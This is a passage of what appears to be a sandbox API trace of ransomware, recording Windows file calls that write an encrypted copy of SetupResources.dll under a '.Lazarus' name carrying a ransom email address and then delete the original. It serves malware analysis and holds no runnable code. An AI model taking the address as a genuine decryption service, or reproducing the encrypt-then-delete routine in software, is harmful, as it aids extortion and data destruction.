CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0066.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0066.693] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.694] GetFileType (hFile=0x420) returned 0x1 [0066.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0066.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.694] AreFileApisANSI () returned 1 [0066.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0066.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0066.694] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.694] GetFileType (hFile=0x428) returned 0x1 [0066.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0066.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0066.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.695] GetLastError () returned 0x0 [0066.695] SetLastError (dwErrCode=0x0) [0066.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0066.695] GetLastError () returned 0x0 [0066.695] SetLastError (dwErrCode=0x0) [0066.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0066.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.695] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0066.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.697] GetLastError () returned 0x0 [0066.697] SetLastError (dwErrCode=0x0) [0066.697] GetLastError () returned 0x0 [0066.697] SetLastError (dwErrCode=0x0) [0066.697] GetLastError () returned 0x0 [0066.697] SetLastError (dwErrCode=0x0) [0066.697] GetLastError () returned 0x0 [0066.697] SetLastError (dwErrCode=0x0) [0066.698] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.698] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.699] GetLastError () returned 0x0 [0066.699] SetLastError (dwErrCode=0x0) [0066.699] GetLastError () returned 0x0 [0066.699] SetLastError (dwErrCode=0x0) [0066.699] GetLastError () returned 0x0 [0066.699] SetLastError (dwErrCode=0x0) [0066.699] GetLastError () returned 0x0 [0066.699] SetLastError (dwErrCode=0x0) [0066.699] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.700] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.700] GetLastError () returned 0x0 [0066.700] SetLastError (dwErrCode=0x0) [0066.700] GetLastError () returned 0x0 [0066.700] SetLastError (dwErrCode=0x0) [0066.700] GetLastError () returned 0x0 [0066.700] SetLastError (dwErrCode=0x0) [0066.700] GetLastError () returned 0x0 [0066.700] SetLastError (dwErrCode=0x0) [0066.700] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.700] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.701] GetLastError () returned 0x0 [0066.701] SetLastError (dwErrCode=0x0) [0066.701] GetLastError () returned 0x0 [0066.701] SetLastError (dwErrCode=0x0) [0066.701] GetLastError () returned 0x0 [0066.701] SetLastError (dwErrCode=0x0) [0066.701] GetLastError () returned 0x0 [0066.701] SetLastError (dwErrCode=0x0) [0066.701] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x958, lpOverlapped=0x0) returned 1 [0066.701] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.702] GetLastError () returned 0x0 [0066.702] SetLastError (dwErrCode=0x0) [0066.702] GetLastError () returned 0x0 [0066.702] SetLastError (dwErrCode=0x0) [0066.702] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.702] GetLastError () returned 0x0 [0066.702] SetLastError (dwErrCode=0x0) [0066.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0066.702] GetLastError () returned 0x0 [0066.702] SetLastError (dwErrCode=0x0) [0066.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0066.702] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0x960, lpOverlapped=0x0) returned 1 [0066.703] GetLastError () returned 0x0 [0066.703] SetLastError (dwErrCode=0x0) [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.703] GetLastError () returned 0x0 [0066.703] SetLastError (dwErrCode=0x0) [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0066.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.703] CloseHandle (hObject=0x420) returned 1 [0066.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.704] CloseHandle (hObject=0x428) returned 1 [0066.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0066.705] AreFileApisANSI () returned 1 [0066.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0066.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0066.705] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.706] GetFileType (hFile=0x428) returned 0x1 [0066.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0066.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.706] GetLastError () returned 0xb7 [0066.706] SetLastError (dwErrCode=0xb7) [0066.706] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.708] CloseHandle (hObject=0x428) returned 1 [0066.708] AreFileApisANSI () returned 1 [0066.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0066.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0066.708] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0066.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.710] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧葐\x07̧비聐蘰\x08賂̧")) returned 0 [0066.710] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0066.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0066.710] AreFileApisANSI () returned 1 [0066.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037", lpUsedDefaultChar=0x0) returned 27 [0066.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0066.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.711] AreFileApisANSI () returned 1 [0066.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x786d0 [0066.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x786d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037") returned 27 [0066.711] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037" (normalized: "c:\\588bce7c90097ed212\\1037"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.711] GetLastError () returned 0x5 [0066.711] GetLastError () returned 0x5 [0066.711] SetLastError (dwErrCode=0x5) [0066.711] GetLastError () returned 0x5 [0066.711] SetLastError (dwErrCode=0x5) [0066.711] GetLastError () returned 0x5 [0066.711] SetLastError (dwErrCode=0x5) [0066.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x786d0 | out: hHeap=0x20000) returned 1 [0066.711] AreFileApisANSI () returned 1 [0066.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x784d0 [0066.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x784d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037") returned 27 [0066.712] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037" (normalized: "c:\\588bce7c90097ed212\\1037"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.712] GetLastError () returned 0x5 [0066.712] GetLastError () returned 0x5 [0066.712] SetLastError (dwErrCode=0x5) [0066.712] GetLastError () returned 0x5 [0066.712] SetLastError (dwErrCode=0x5) [0066.712] GetLastError () returned 0x5 [0066.712] SetLastError (dwErrCode=0x5) [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x784d0 | out: hHeap=0x20000) returned 1 [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0066.712] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1038", cAlternateFileName="")) returned 1 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0066.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0066.712] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78710 [0066.712] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.712] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0066.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.713] 